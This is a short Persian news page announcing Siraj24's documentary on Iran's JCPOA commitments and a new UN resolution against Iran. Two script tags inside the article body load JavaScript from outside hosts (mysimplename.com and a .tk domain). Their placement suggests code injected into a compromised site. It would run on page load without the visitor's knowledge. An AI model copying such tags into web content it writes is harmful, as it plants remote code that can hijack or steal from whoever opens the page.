مستنــد «آزردگـــی دوبــاره روح تـــوافـق»


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>یک بار دیگر قطعنامه‌ای علیه ایران در دستور کار سازمان ملل قرار گرفته است و اتفاقا کسانی که جلوی ایران نشسته بودند و تعهد کرده بودند دیگر خبری از قطعنامه و تحریم نباشد نیز پای این قطعنامه را امضا کرده‌اند. از این رو «سراج24» مستند "آزردگی دوباره روح توافق" را منتشر کرد و در این مستند به بازخوانی اظهارات رئیس جمهور و مقامات مذاکره‌کنندگان ایران و کشورهای 1+5 درباره تعهدات ایران و کشورهای 1+5 در برجام می‌پردازد.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر